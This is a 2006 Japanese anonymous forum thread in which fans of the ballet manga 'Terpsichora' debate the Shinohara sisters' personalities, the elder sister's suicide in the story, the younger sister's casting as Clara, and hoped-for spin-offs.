276 :花と名無しさん:2006/07/10(月) 14:19:25 ID:???0
今、とぅぉねらの白鳥を聴いてますが、暗い曲ですね。
さすがシベリウス

277 :花と名無しさん:2006/07/10(月) 14:20:07 ID:???0
外伝としては
椿のその後
美智子先生の過去
トガッシー、バンダナの若い頃
あたり読みたい。

278 :花と名無しさん:2006/07/10(月) 14:20:48 ID:???0
トシオ父は、入り婿だったかも。

279 :花と名無しさん:2006/07/10(月) 14:21:30 ID:???O
>>261
自分には高額の手術が重荷に思える方が
甘えてると思う。

280 :花と名無しさん:2006/07/10(月) 14:21:47 ID:???0
としおと千恵子は不釣合い

281 :花と名無しさん:2006/07/10(月) 14:22:54 ID:???0
>>280
いや似合ってると思うが。
両方ともそこそこ資産家の娘息子。

282 :花と名無しさん:2006/07/10(月) 14:24:34 ID:???0
甘えてるかもね、たしかに・・・。

283 :花と名無しさん:2006/07/10(月) 14:24:41 ID:???0
>>277
いや、外伝だったらやっぱりなんと言っても、美智子先生でしょ。


284 :花と名無しさん:2006/07/10(月) 14:26:01 ID:???0
美智子先生の若いころの踊りが見てみたい。

285 :花と名無しさん:2006/07/10(月) 14:27:09 ID:???0
甘えてるというより、ありがたさ余って、心苦しさ100倍ってとこじゃないの?

286 :花と名無しさん:2006/07/10(月) 14:27:39 ID:RJ52Wzyy0
家庭的でまめまめしい旦那と、活動的で社交的な妻というのは、
とっても良い組み合わせだと思う。

287 :花と名無しさん:2006/07/10(月) 14:28:50 ID:???0
いいお父さんだよね。

288 :花と名無しさん:2006/07/10(月) 14:29:16 ID:???0
結局千花にとっては恵まれた環境の全てが裏目に出て
重荷に感じて死にました。

もう追求しても意味ないからつまんないよ。
それより利夫と千恵子の馴れ初めがきになるw

289 :花と名無しさん:2006/07/10(月) 14:29:33 ID:???0
テレプシ外伝読みたくなっちゃったじゃないかw

まぁ絶対出してくれないんだろうけど。

290 :花と名無しさん:2006/07/10(月) 14:30:00 ID:???0
いいお父さん。

ちょっと娘の気持ちに鈍感だけど。

291 :花と名無しさん:2006/07/10(月) 14:30:52 ID:???0
>>289
外伝以前に、本編をいつまで書き続けられるか。
作者はご高齢だしー。

292 :花と名無しさん:2006/07/10(月) 14:31:00 ID:???0
エミちゃんの外伝に興味はありません

293 :花と名無しさん:2006/07/10(月) 14:32:10 ID:???0
ナレソメで思い出したけど、昨日の新婚さんいらっしゃい青森篇は
すごかった。

294 :花と名無しさん:2006/07/10(月) 14:34:06 ID:???0
>>271 それ良いかもv

295 :花と名無しさん:2006/07/10(月) 14:34:15 ID:???0
コミックス&立ち読み併用なのですが、
ひとみちゃんは入院後どうなってますか?

296 :花と名無しさん:2006/07/10(月) 14:34:58 ID:???0
放置されてる

297 :花と名無しさん:2006/07/10(月) 14:35:18 ID:???0
いや、外伝は坂口のアイドルオーディション

298 :花と名無しさん:2006/07/10(月) 14:35:27 ID:???0
放置かww、ありがとうございました。

299 :花と名無しさん:2006/07/10(月) 14:36:12 ID:???0
空美ちゃんでしょ、次はやっぱ。

300 :花と名無しさん:2006/07/10(月) 14:38:10 ID:???0
エミちゃんの外伝にしか興味はありません

301 :花と名無しさん:2006/07/10(月) 14:40:34 ID:???0
坂口のキャラは、ゆきの友人多しの象徴ともされ。
チカの中学の友人はついにひとりも出てこなかった世ね。

302 :花と名無しさん:2006/07/10(月) 14:40:57 ID:???0
エミ外伝は案外面白いかもよ。
娘贔屓ばかりする篠原先生に振り回される悲劇少女。
そろそろ教室変えようかしら?と思うと引き止められてキトリを踊らされる。

303 :花と名無しさん:2006/07/10(月) 14:41:38 ID:???0
チカは学校で孤立してたんだろうな。

304 :花と名無しさん:2006/07/10(月) 14:42:07 ID:???0
篠原ママは、娘びいきしてる?発表会などで?
そりゃ、はたから見ればそうかもしれないけど、ゆきに厳しいし、
チカにもある意味厳しかった。

305 :花と名無しさん:2006/07/10(月) 14:43:23 ID:???0
トゥオネラ聴いていると、ほんとに暗くなる。
山岸先生もよく、考えたものだ。

306 :花と名無しさん:2006/07/10(月) 14:43:47 ID:???0
娘びいきと言うより、バレエに厳しい人という印象だよね。
ぽおっとした六花に対して、きつすぎるくらいだし。

外伝は金子先生編を希望w


307 :花と名無しさん:2006/07/10(月) 14:44:38 ID:???0
ジプシーの踊りはよかったよねぇ。

308 :花と名無しさん:2006/07/10(月) 14:44:52 ID:???0
>>290
利夫からすると、ユキのことは読めるけれど、
チカはわかりにくい。
相性というのもあるし、チカ自身が母親に拘っているのがあるし、
完璧主義者で弱みを見せないので、読みにくい子だというのもある。
よくあること。

309 :花と名無しさん:2006/07/10(月) 14:46:48 ID:???0
でもエミちゃん辞めようとした時は、本人はそう思ってたみたいだったよ。

310 :花と名無しさん:2006/07/10(月) 14:47:48 ID:???0
チカユキvsエミだったら、どこの教室だって(ry

311 :花と名無しさん:2006/07/10(月) 14:48:58 ID:???0
>>308
千恵子にとっても、ゆきはわかりやすい子、
ちかは扱いにくい子だったよね。

誰も誰もちかちゃんの本当の苦しみをわかってあげられなかった

312 :花と名無しさん:2006/07/10(月) 14:55:42 ID:???0
子供って両親の馴れ初め気にしないかな?
なんで自分は生まれたんだろうという事から。
憔悴しきった千恵子さんをかいがいしく世話するお父さんに
ユキがなんでお母さんと結婚したの?とか聞かないかな。

313 :花と名無しさん:2006/07/10(月) 14:56:01 ID:???0
チカ本人が、「人に苦しんでると思われること」を極端に嫌う性格だから、
仕方ないっちゃあ仕方ない。


314 :花と名無しさん:2006/07/10(月) 14:56:51 ID:???0
千恵子にとって扱いにくくてわがままなのは六花だったじゃん。
千恵子の思い込みだけどさ。


315 :花と名無しさん:2006/07/10(月) 14:58:48 ID:???0
利夫は跡取り息子だし実家のある埼玉にこだわって県庁に就職。
千恵子さんは転勤の範囲が狭い→教室を継続しやすいという事で
相手としてよかったのかも。もちろん家事も完璧で甘えさせてくれる事も含めて。

青山のお祖父ちゃんって千恵子さんがバレエどっぷりだった割に
そんなにバレエ好きって訳でもなさそうだね。孫のは見るけど。
千恵子のバレエへの意志も前妻のお祖母ちゃんが関係してたりして。

316 :花と名無しさん:2006/07/10(月) 14:59:13 ID:???0
>>311
篠原母にとって、わかりにくく扱いにくいのは六花の方だと思うけど。
六花が股関節の件にショックを受けてバレエをやめようとした件も、
「我侭で困った」と回想していたし、
六花の良さというのは理解しにくく、「この子はもう!」となり易い。
中学生になってから扱いにくいとも思っていた。
親としての愛情はあるし(ルティレでの変化も金子先生より早く気付いた)、
結果を出した時は喜んでくれるけれど、理解者ではない。
ただ、六花の方が、千花より、案外母親と話をしていて、結構いい母子関係。

篠原母と千花は、うまく行っている時はすごくいいんだけど、
ずれ出すとこじれる。千花への期待が強いし、千花も弱みを見せるのを嫌う。

そもそも、他者が本当に理解してくれる例の方がめずらしいのでは?
誤解とか理解不足の中で多くの人間はやりくりしてい生きている。

317 :花と名無しさん:2006/07/10(月) 14:59:27 ID:???0
ユキは誰にとってもワガママだったと思うが。

318 :花と名無しさん:2006/07/10(月) 15:00:44 ID:???0
千恵子さんもバレエでお母さんの期待に答え切れなかった人だったりして。

319 :花と名無しさん:2006/07/10(月) 15:01:16 ID:???0
理解不足もあるけれど、千花ちゃんの性格による業という面もある。

320 :花と名無しさん:2006/07/10(月) 15:01:58 ID:???0
チカ、プライド高いからな

321 :花と名無しさん:2006/07/10(月) 15:02:48 ID:???0
>>317
バレエを辞めるようとしたことは、「わがまま」とは違うと思うけどね。

322 :花と名無しさん:2006/07/10(月) 15:02:49 ID:???O
わがままで自己主張するからわかりやすいとも言う

323 :花と名無しさん:2006/07/10(月) 15:04:25 ID:???0
連載が続いていくうちにユキよりずっと好きになったけど
初期のチカは普通にイヤミな子に見えた。
内面をよく知らないといじめられるかもしれないね。


324 :花と名無しさん:2006/07/10(月) 15:04:47 ID:???O
「わかってあげられなかった」
というか、わかる努力も、わからせる努力もしてないよな。
どっちも。

325 :花と名無しさん:2006/07/10(月) 15:05:30 ID:???0
ユキは根性なしなだけでわがままとは違うと思う。

326 :花と名無しさん:2006/07/10(月) 15:06:14 ID:???0
>わかる努力も、わからせる努力もしてないよな。

オマイが一番大人

327 :花と名無しさん:2006/07/10(月) 15:07:56 ID:???0
六花は金子先生が登場しなければとっくにバレエやめてたカンジ。
環境は最高なのにね。
嫌いではないけど本当はバレエあんま好きじゃななさそうで六花には全く興味ない。

328 :花と名無しさん:2006/07/10(月) 15:08:17 ID:???0
>324
まだまだ子供なのに、自分の苦しみを周囲に分かって貰う努力、
というのを求めるのは酷だと思うが?
やっぱり周りの大人が気がついて欲しかったな。金子先生とか。
でも、千恵子に気兼ねして何も言えなかったのかなあ。

329 :花と名無しさん:2006/07/10(月) 15:08:30 ID:???0
そうかなぁ、嫌味な子というより、妬まれやすいんじゃないの?

330 :花と名無しさん:2006/07/10(月) 15:09:18 ID:???0
>>325
確かに甘ちゃんで頼りないのも否めないが、
根性無しではないと思う。
ダンス部の時も、先輩に文句を言われて反発するのでなく、
いい形のものを作り出すよう頑張っていたし、
クララでもところどころよろよろしつつ、努力もしていた。

331 :花と名無しさん:2006/07/10(月) 15:09:23 ID:???0
六花って、出来の良すぎる姉と母に、比較されるのが辛かっただけじゃないの?
わがままとかやる気がないとか、そういう風には受け止めなかったけどな。


332 :花と名無しさん:2006/07/10(月) 15:09:44 ID:???0
私も六花のキャラは嫌いではないけれど、バレエに挑む気合がチカとは違って、
今後、チカがいなくなった今、どういう展開になるかと・・。

333 :花と名無しさん:2006/07/10(月) 15:10:55 ID:???0
>>329
2とかネットだと正しい人は正しいけど・・・
現実生活で「出来る人間でキャンキャン正論吐く人」って普通に嫌われるよ

334 :花と名無しさん:2006/07/10(月) 15:11:06 ID:???0
カラボスは良かったよね

335 :花と名無しさん:2006/07/10(月) 15:11:44 ID:???0
>>331
クララの髪型の件でもそういう面が少し出されていたね。
当初は母親の期待が露骨に姉に傾いていたから、
あれはしんどい状況だ。

336 :花と名無しさん:2006/07/10(月) 15:12:07 ID:???O
>>327
逆だよ。本当は踊ることが好きなのに
身体的問題に絶望して辞めてたの。

337 :花と名無しさん:2006/07/10(月) 15:12:20 ID:???0
うーん、それは言える。
本番前に韓国行っちゃうしね。

338 :花と名無しさん:2006/07/10(月) 15:12:45 ID:???0
>>334
あれ小物に頼って振り付けでテク無いの誤魔化してるだけで嫌いだった
逃げの振り付けだよね
あんなので目立っていい気にならないでほしかった

339 :花と名無しさん:2006/07/10(月) 15:13:04 ID:???0
チカちゃんきゃんきゃんしてましたか?

340 :花と名無しさん:2006/07/10(月) 15:14:21 ID:???0
>>338
親不孝者とか、びっこのバレリーナ、とか書き込みしそうな方ですなw


341 :花と名無しさん:2006/07/10(月) 15:14:43 ID:???0
みんな六花はいまいち好きでないようだね。


342 :花と名無しさん:2006/07/10(月) 15:16:17 ID:???O
>>328
努力と言うと大袈裟だけど
ユキとか自分の気持ちを理解してもらうのがうまい子はいるよ。
なにもサイン出さなければわかりようがない。

343 :花と名無しさん:2006/07/10(月) 15:16:39 ID:???0
ここは優しい方。
ダンス板だとマジで嫌われてるよ。

344 :花と名無しさん:2006/07/10(月) 15:17:06 ID:???0
たしかにー、、、。
チカちゃんは、最期のほうはおお泣きしてたけど、自殺数日前は元気モードだったんだもんね。

345 :花と名無しさん:2006/07/10(月) 15:17:34 ID:???0
弱音を吐かない(はけない)、というのは千花の性格なのかな。
それとも努力と根性をメインとした、千恵子の教育の成果なのかな。

346 :花と名無しさん:2006/07/10(月) 15:17:47 ID:???0
ユキの甘ったれっぷりは、イライラするよ。

347 :花と名無しさん:2006/07/10(月) 15:18:05 ID:???0
金子先生の依存心強し。

348 :花と名無しさん:2006/07/10(月) 15:18:52 ID:???O
バレエヲタには正統派バレエを踊らないのが
気に入らないのかな?

349 :花と名無しさん:2006/07/10(月) 15:18:54 ID:???0
もともとの性格に、千恵子の教育が拍車をかけた。

350 :花と名無しさん:2006/07/10(月) 15:19:34 ID:???0
ピルエット下手すぎ。

351 :花と名無しさん:2006/07/10(月) 15:21:07 ID:???0
>>348
ああいうの(ユキ)が一人混ざると迷惑だってことを、日頃体験してるんだよ。

352 :花と名無しさん:2006/07/10(月) 15:22:28 ID:???0
あの子、他の人にも嫌われてるよ。

とかいわれても、自分が好きな人を嫌いになるのは中々難しいよな。w
六花、バレエが好きだけど努力は嫌い、みたいな、
甘えん坊でへたれな感じが、なかなか良い味を出してると思うし。

>351

そしてそういう子に才能があったりすると、余計に腹が立つんでしょ?w

353 :花と名無しさん:2006/07/10(月) 15:22:34 ID:???0
千花の板挟みな面には同情するけれど、本人も弱みを見せるのを嫌っていた。
親の期待が災いしていたけど、その恩恵も受けていた。
ひたすら周囲がいけなくて、千花が一方的な被害者とも思わない。
千花が悪いとかいう意味でなくて、生真面目でプライドが高い損な性格。
毛箱ともろやり合うこともせず、いじめについて家族と話すのでもなく、
けれど、「見返してやる」とメラメラとしていたり、「あいつ」に拘っている。
「あんな奴の言うことを気にするなんて」という利夫の言葉に同意。

354 :花と名無しさん:2006/07/10(月) 15:24:01 ID:???0
>>341
好きだよ。
ただそれを言うと、アンチ六花がうるさいから
あまり書き込まないだけ。


355 :花と名無しさん:2006/07/10(月) 15:24:18 ID:???0
>>352
多分そうだろうけど、実際は、ああいう性格で才能ある子はいない。

356 :花と名無しさん:2006/07/10(月) 15:24:50 ID:???0
再起不能なんて言ってるやつらの鼻を明かしてやりたかったって言ってたモンね。
でも、それなら死ななくても、って思うけど。

357 :花と名無しさん:2006/07/10(月) 15:26:17 ID:???0
>355
作者は六花に才能を与えてるみたいだけどねー。
それが今後花開いていく展開になるんだと思うが。
千花の死を乗り越えて、自分が真にバレエに打ち込んで、
とかなんとか。

358 :花と名無しさん:2006/07/10(月) 15:27:07 ID:???0
>>355
私はそういう子を知っている。
おっとりしていて、自信なさそうなことを言っているのに、
どんどん成功して、で、対抗馬の子がメンヘルになった。(実話)


359 :花と名無しさん:2006/07/10(月) 15:27:08 ID:???0
振り付け師の才能でしょー

360 :花と名無しさん:2006/07/10(月) 15:27:27 ID:???0
>>351
先生の視点ではそうだが、生徒の視点で迷惑ってかけてたか?
それに先生の視点でも、言うことを聞かない生徒ではなく挫けやすい生徒なだけだから、
そんな生徒を迷惑と思う先生がどうかしてる。

361 :花と名無しさん:2006/07/10(月) 15:27:50 ID:???0
あいつを四角で囲ってバッテンがなんとなく変だった
毛箱の名字でもかいてぐしゃぐしゃとかしてくんないと


362 :花と名無しさん:2006/07/10(月) 15:28:26 ID:???O
>>351
ふーん、バレエ習ってるとああいう子良くいるのかな?
ユキは他人に迷惑をかけてる描写はないけど
そういう子をユキに投影して嫌ってる感じ?
大変だね

363 :花と名無しさん:2006/07/10(月) 15:28:46 ID:???0
>>359
あいつ、存在感ある                    by鳥山

富樫も、振付以前に、下手にもかかわらずバレコンでの
踊りが印象に残っていたようだしね。

364 :花と名無しさん:2006/07/10(月) 15:29:57 ID:???0
確かに、毛箱ごときの言うことになんて左右される必要なんてないのに・・・

365 :花と名無しさん:2006/07/10(月) 15:30:35 ID:???0
>>360
誰が先生の視点なんて書いたかよー、
「ダンス板ではユキの評価が低い」って書いてあったから、
そうだろうね、って話だろーが。何飛躍してんだ

366 :花と名無しさん:2006/07/10(月) 15:31:25 ID:???0
実力無いのに受けだけはいいオンナ(コネ有り)なんて普通相手にされないだろw
ユキみたいな奴は実在するw

漫画の中では今のところひとみ桜子茜より1コ下というのが効いてると思う。
将来苦労するだろうね。

367 :花と名無しさん:2006/07/10(月) 15:32:04 ID:???0
もしかして、数日前に六花叩きで暴れていた人が今日も暴れている?
あの時は夕方にぴたっと止んでいたけれど、それを指摘されてたから
今日は6時以降も頑張るつもりかな?

368 :花と名無しさん:2006/07/10(月) 15:33:45 ID:???0
>>365
「日頃体験」とあったから書いたまで。
実際ユキがイラつくと言ってる人は日頃体験してないのかもしれないが。

369 :花と名無しさん:2006/07/10(月) 15:34:41 ID:???0
やー、ユキは良く描けていると思う。
マジでああいう女いるよ。

将来プリマになるとか世界的に振付師になるとかじゃなければリアル感ありありw
ギシ先生が↑こういう展開にしないんならギシ先生はやっぱ天才だと思う。

370 :花と名無しさん:2006/07/10(月) 15:34:52 ID:???0
>>367
今日はわりと穏やかな流れだし、いないと思う。

371 :花と名無しさん:2006/07/10(月) 15:35:09 ID:???0
>>367
先日は知らないが、今の進行はユキを「叩いてる」って程ではないと思うが。
脳内に敵を作りすぎではないか?
夕方にピタッと止むのは、お母ちゃんたちが夕飯の仕度するからだよ。


372 :花と名無しさん:2006/07/10(月) 15:36:11 ID:???0
いや、夜の仕事してるからかもよ?>ぴたっと止む

373 :花と名無しさん:2006/07/10(月) 15:36:59 ID:???0
テレプシ読みながら、ユキ叩きながら、夜の仕事。
味わい深い人生だ。

374 :花と名無しさん:2006/07/10(月) 15:37:58 ID:???0
そうなんだぁ。ゆき叩きの人。やるの仕事?

375 :花と名無しさん:2006/07/10(月) 15:37:59 ID:???0
バレエはやってないからわからないけど
バレエはスポーツじゃなくて芸術なんだから
かわいいとか華があるのも実力のうちじゃないの?

376 :花と名無しさん:2006/07/10(月) 15:39:02 ID:???0
ゆきちゃんは或る意味、才能あると思うよ。

377 :花と名無しさん:2006/07/10(月) 15:40:31 ID:???O
華のない桜子

378 :花と名無しさん:2006/07/10(月) 15:41:40 ID:???0
桜子には目力がない

379 :花と名無しさん:2006/07/10(月) 15:41:47 ID:???0
ユキは現時点では桜子よりは上だよね?
大役をやると伸びるし。それに桜子にはない存在感があるしw
でも桜子には戻ってきて欲しいな。これという欠点もないし背も伸びそうだし。

380 :花と名無しさん:2006/07/10(月) 15:41:53 ID:???O
才能あるし、努力もしてるじゃん。

381 :花と名無しさん:2006/07/10(月) 15:43:04 ID:???0
六花叩きって、実力もない甘ちゃんがいい思いばっかりするのは許せん、って
一言でこんな感じ?

382 :花と名無しさん:2006/07/10(月) 15:43:41 ID:???0
ユキの文句、言ったらいけないのか?
嫌いってだけで「叩き」かよ。

383 :花と名無しさん:2006/07/10(月) 15:44:10 ID:???0
>>382
言ってよ文句。

384 :花と名無しさん:2006/07/10(月) 15:45:12 ID:???0
>>381
叩いてるつもりはないが、

甘ったれだから嫌い、これがすべて。

385 :花と名無しさん:2006/07/10(月) 15:45:35 ID:???0
ジゼル、あの子なら踊れたな。と馬子が言っていたが
今後精進して技術を身につければ六花の方が似合いそうだと思う。

386 :花と名無しさん:2006/07/10(月) 15:46:24 ID:???O
>>382
こないだは「チカにも悪いところあるよね」と言う話でも
チカ叩きにされていた。
そんなもんだよ。

387 :花と名無しさん:2006/07/10(月) 15:47:20 ID:???0
キャラクターへの文句言うのは全然OKだと思う。
問題は自分と違う意見を出す相手を仮想敵にして、
人格まで否定しようとする嵐。

388 :花と名無しさん:2006/07/10(月) 15:47:41 ID:???0
ユキ程度の甘ったれは普通にいる。
一番困るのは言うこと訊かないで文句ばかり言う甘ったれ。

389 :花と名無しさん:2006/07/10(月) 15:48:01 ID:???0

運がよすぎる、その幸運のために他の子が不幸にされるから嫌い これがすべて。

390 :花と名無しさん:2006/07/10(月) 15:50:18 ID:???0
ユキって何気にしっかり技術も上がってるように見えるけど?
ユキの場合は自己評価が低すぎてダメに見えるんじゃない?

391 :花と名無しさん:2006/07/10(月) 15:50:20 ID:???0
甘ったれは嫌われるよ〜、というのは、
作中で、ゴッシーやら瞳やら桜子やら茜やらを使って、
さんざん示されてるからね・・・。

392 :花と名無しさん:2006/07/10(月) 15:51:04 ID:???0
芽がでなかった自分と比較してイラついてるだけ。
大成してたらユキ程度の性格でイラついたりしない。

393 :花と名無しさん:2006/07/10(月) 15:51:22 ID:???0
>>389
でも不幸になるのがケバ子だったら構わんのでしょ?


394 :花と名無しさん:2006/07/10(月) 15:52:22 ID:???0
>>387
>>392みたいなのが、荒らしに該当するわけですね。

395 :花と名無しさん:2006/07/10(月) 15:52:28 ID:???0
別に六花のせいで空美が貧乏になったわけじゃないし
六花のせいで千花が怪我したわけでもない。
そういうのを八つ当たりって言うんだよ。

396 :花と名無しさん:2006/07/10(月) 15:52:42 ID:???0
六花叩きも飽きたな。
どうせならいままで叩かれたことの無いキャラの欠点を見つけて叩こうよ。

397 :花と名無しさん:2006/07/10(月) 15:53:40 ID:???0
空美叩き

ぼんびーなんだよ
臭せえんだよ
顔きもいんだよ

ふつうにいじめですな

398 :花と名無しさん:2006/07/10(月) 15:54:31 ID:???0
ところで、フトミってまだ入院中?

399 :花と名無しさん:2006/07/10(月) 15:54:33 ID:???0
>>393
毛箱だろうがチカだろうが不幸になってもそこまで思い入れはないな

400 :花と名無しさん:2006/07/10(月) 15:54:39 ID:???O
じゃあクミを叩いてみようか

401 :花と名無しさん:2006/07/10(月) 15:54:50 ID:???0
富樫に見込まれて、クララ大抜擢の持ち上げられかたが、嫌い。
桜子だって、チャンスに恵まれて役に実力が追いつくくらいのレッスンを受けたら、
あるいは目に力が入ったかもしれんw

402 :花と名無しさん:2006/07/10(月) 15:55:15 ID:???0
>>399
究極の不幸みたいになっちゃった千花ちゃんを、何とも思わないのあなた?

403 :花と名無しさん:2006/07/10(月) 15:56:36 ID:???0
じゃ、
坂口は、実はユキの成功を誰よりも妬んでいるが、
学校にいる以上、ユキを手放すと都合が悪いのでつるんでるだけ。

書き込み、ユキから情報を得た坂口かもよ。

404 :花と名無しさん:2006/07/10(月) 15:56:44 ID:???O
かぶった。

じゃあミズキを叩いてみよう




書き込み過ぎててキモイ
実は腹黒そう

405 :花と名無しさん:2006/07/10(月) 15:56:54 ID:???0
舞台化粧すりゃ、目の面積が5倍くらいになって桜子だって見れるようになるから。

406 :花と名無しさん:2006/07/10(月) 15:56:55 ID:???0
>>402
なんとも、というか、ここで毛箱許せんといってる人ほど
思い入れもない。

407 :花と名無しさん:2006/07/10(月) 15:57:37 ID:???0
>>406
そんな無感動でマンガ読んでて、なんか面白いわけ?

408 :花と名無しさん:2006/07/10(月) 15:58:03 ID:???0
>>401
団の公演だからね、
そりゃ将来性のある子にチャンスをあたえますよ。



409 :花と名無しさん:2006/07/10(月) 15:58:45 ID:???0
>>404
わたし弱いんですぅ、って男に媚びるタイプだよね水木。
水木は叩きがいのあるキャラだな。

410 :花と名無しさん:2006/07/10(月) 15:59:19 ID:???0
篠原姉妹は自宅でレッスン、母や金子せんせに教えてもらえるけど
茜もひとみも桜子もそんな好条件ではないなか
よくがんばってる(た)と思う。

411 :花と名無しさん:2006/07/10(月) 15:59:55 ID:???0
毛箱なんてせいぜいあと一回くらいでてくるかこないかでしょー。

412 :花と名無しさん:2006/07/10(月) 16:00:46 ID:???0
>>408
いや、団の公演だから、堅実なキャスティングするんじゃないの普通?
教育的効果より、まず公演の成功だよ。
ろくに踊れない六花の抜擢ってのは、不自然なハナシだと思ったよ。
まあ結果的にはなんとかなったけどさ。

413 :花と名無しさん:2006/07/10(月) 16:01:19 ID:???0
>>407
物語は物語として楽しむだけだから

414 :花と名無しさん:2006/07/10(月) 16:02:34 ID:???0
>>412
桜子との比較じゃないのか?

415 :花と名無しさん:2006/07/10(月) 16:02:34 ID:???0
>>408
将来性がある設定なのはわかるが、
あの時点(クララ決定)では実力が誰の目にもアチャ〜だったやん。
茜が2日踊るとか、エロ体だけどひとみがクララなどのほうが、アノ場合は自然。
もう1年待って抜擢ならわかるのだが。

416 :花と名無しさん:2006/07/10(月) 16:02:36 ID:???0
>>411
もれは、もう出て来ないとオモ

417 :花と名無しさん:2006/07/10(月) 16:03:45 ID:???O
>運がよすぎる、その幸運のために他の子が不幸にされるから嫌い


って言うほど他の子には思い入れないな。
チカが死んでユキが幸運だとは思えないし。

418 :花と名無しさん:2006/07/10(月) 16:05:09 ID:???0
>>415
412だけど、全く導管。
カネとってアチャーの人を出すなんて、正気の沙汰とは思えん。
それも他に選択肢はあるのに。

419 :花と名無しさん:2006/07/10(月) 16:05:35 ID:???0
ひとみリタイアで友達役ゲット、チカリタイアでクララゲット。
強運ですがな。

420 :花と名無しさん:2006/07/10(月) 16:06:51 ID:???0
>>417
というか別にユキの幸運で他の子不幸になってないしね。
ふとみちゃんがクララになれなかったのは単に体格の問題

421 :花と名無しさん:2006/07/10(月) 16:06:52 ID:???0
>>415
オペラだと、スーパーデブの椿姫(結核で死ぬ設定w)って平気であるけど、
バレエでデブのクララって無くね?

422 :花と名無しさん:2006/07/10(月) 16:07:21 ID:???0
>>417
幸運=バレリーナ或は振付け師として大成するであろうってことでね


423 :花と名無しさん:2006/07/10(月) 16:08:10 ID:???0
会議室のメンバー、とくにトガッシーは去年の六花代役クララの印象が気に入ってたんじゃないの?
六花のクララって可愛い感じするじゃん。
漫画だから、、、

424 :花と名無しさん:2006/07/10(月) 16:08:23 ID:???0
六花の幸運は




マンガの主役であること

425 :花と名無しさん:2006/07/10(月) 16:09:24 ID:???0
デブだからってより、オパイがオッキかったからNGだったんだっけか。

426 :花と名無しさん:2006/07/10(月) 16:09:59 ID:???O
何でユキが茜と並んでクララな訳?

とは、主人公含めて誰もが謎だったよな。
いけると推した富樫先生以外



だから作中でも叩かれてたし、プレッシャーで本人も潰されそうになったんじゃん。

427 :花と名無しさん:2006/07/10(月) 16:10:56 ID:???0
まあ実際に六花と茜みたいなのがいたとして、ステージ見たらシレっとそつ無く
踊るアカネより、情感こもったユキのほうが可愛らしくていいかもな。
わたしら素人にはどうせ細かい技術どうこうなんてわからんし。


428 :花と名無しさん:2006/07/10(月) 16:11:01 ID:???0
>>423
だとしたら、チカの怪我が抜擢のチャンスになったのだね。
だから、チカの不幸はユキの栄養などと言われるのだ。

429 :花と名無しさん:2006/07/10(月) 16:11:27 ID:???0
>>425
うん。体形が子供ではない。もう子役はできない。

430 :花と名無しさん:2006/07/10(月) 16:12:22 ID:???0
ユキが「オオ」といわれたグランジュテで舞台を横切るためには
ひとみを倒れさせひとみの代役としてその場にいる状況をつくり
(あれがなければユキは客席にいるだろうから)
チカが怪我をしないとダメだから。

431 :花と名無しさん:2006/07/10(月) 16:13:01 ID:???0
>>426
ゴッシーも言ってたよな。
「そう思ってるんだったら、なんでクララが六花ちゃんなのよ」だっけ

432 :花と名無しさん:2006/07/10(月) 16:13:05 ID:???0
>>427
情感込め込めの少女の演技って、ちょっとキモいよ。
松山の少女たち、喜び組とか言われてるし。

433 :花と名無しさん:2006/07/10(月) 16:13:27 ID:???0
>>429
体型が子供でないのでクララになれなかったフトミ
でももらった役はクララの友達…

434 :花と名無しさん:2006/07/10(月) 16:13:35 ID:???0
>>427
そうそう。
悪いけどひとみちゃんみたいな子がクララ役はあり得ない。

435 :花と名無しさん:2006/07/10(月) 16:14:33 ID:???0
六花が甘ったれなのは、
そばに千花がいたからなのも有りそうな気が。
六花が困ってるときは、
いつも千花がフォローしてたんじゃないかな。
年上の優等生千花と張り合うのも分が悪いし、
その状況に甘えれば、六花としては楽だし、
すっかり甘え上手ポジションに。
千花としては六花が駄目でいてくれた方が
ライバルにならなくて良いし、
駄目な六花の面倒みることで
良いお姉ちゃんぶりをアピールすることもできる。
まあ、自分が伸び悩んで、六花が成長して、
心に余裕がなくなってくると、
そんな妹に付き合うのも苦痛だっただろうけど。

というわけで、甘えさせてくれる姉がいなくなったので、
六花は自分でしっかりせざるをえないと思う。
金子もそろそろ嫁にいって、篠原家から離れるかもしれないし。

436 :花と名無しさん:2006/07/10(月) 16:14:36 ID:???0
エロいクララが、おとぎの国で王子と不倫。

437 :花と名無しさん:2006/07/10(月) 16:17:02 ID:???0
他の人の不幸を栄養にして、自分が幸福になるから六花が嫌い
って言ってる人がいるけどバカバカしい意見だ。
誰かが主役をやれば、必ず他の人はあぶれるに決まってるじゃん。

んなこと言ったら、なんでもそう。
たとえば後進国の国民を飢えさせて、日本は大量に食料を輸入してるわけだ。
他人の不幸を奪わない幸福なんて有り得ん。
それに気付かないのは、世間知らずのコドモ。

438 :花と名無しさん:2006/07/10(月) 16:17:08 ID:???0
>>432
クララはそういう役だからー、
他の役との絡みも多いし演技必須。

439 :花と名無しさん:2006/07/10(月) 16:17:54 ID:???0
六花がいきなりクララに抜擢されたのは、
単純にアラベスクを下敷きにしたギシ先生の遊びではないかと。

440 :花と名無しさん:2006/07/10(月) 16:19:02 ID:???0
金子の髪形はさざえさん

441 :花と名無しさん:2006/07/10(月) 16:19:40 ID:???0
>>437
そんなことはわかっているよ
だからといって、主役を愛さなければならない理由もないだろ?
あぶれた者に対して思い入れをもつ者がいても不思議じゃないだろ?

442 :花と名無しさん:2006/07/10(月) 16:20:56 ID:???0
ユキがいなくてもチカは怪我をし、ふとみは倒れた。
たまたまそれでユキにチャンスが巡っただけ。
それでユキが嫌いとかいうのはどうかしてる。

443 :花と名無しさん:2006/07/10(月) 16:21:01 ID:???0
基本的に駄目っ子六花ちゃんが一人前の踊り手になるお話で良いですかね?
>テレプシ



444 :花と名無しさん:2006/07/10(月) 16:21:08 ID:???O
ユキにしてみれば、
本番当日に突然舞台に上げさせられた挙げ句、
姉が怪我した上に病院に着いていく訳でもなくいきなり姉の代役をさせられた。


分不相応な役を押しつけられて、クラスの友達から孤立して
怖い先生にも目を付けられた。



不幸だわ〜って感じじゃない?
「ユキちゃん贅沢だよ!」ってチカに言われてたけどw

445 :花と名無しさん:2006/07/10(月) 16:22:14 ID:???0
日本が甘ったれなのは、
そばにアメリカがいたからなのも有りそうな気が。
日本が北朝鮮ミサイルなどで困ってるときは、
いつもアメリカがフォローしてたんじゃないかな。
スーパーパワーのアメリカと張り合うのも分が悪いし、
その状況に甘えれば、日本としては楽だし、
すっかり甘え上手ポジションに。
アメリカとしては日本が駄目でいてくれた方が
ライバルにならなくて良いし、
駄目な日本の面倒みることで
良いお兄ちゃんぶりをアピールすることもできる。
まあ、自分がイラク・イラン問題などで窮地に陥って、日本が成長して、
心に余裕がなくなってくると、
そんな子分に付き合うのも苦痛だっただろうけど。

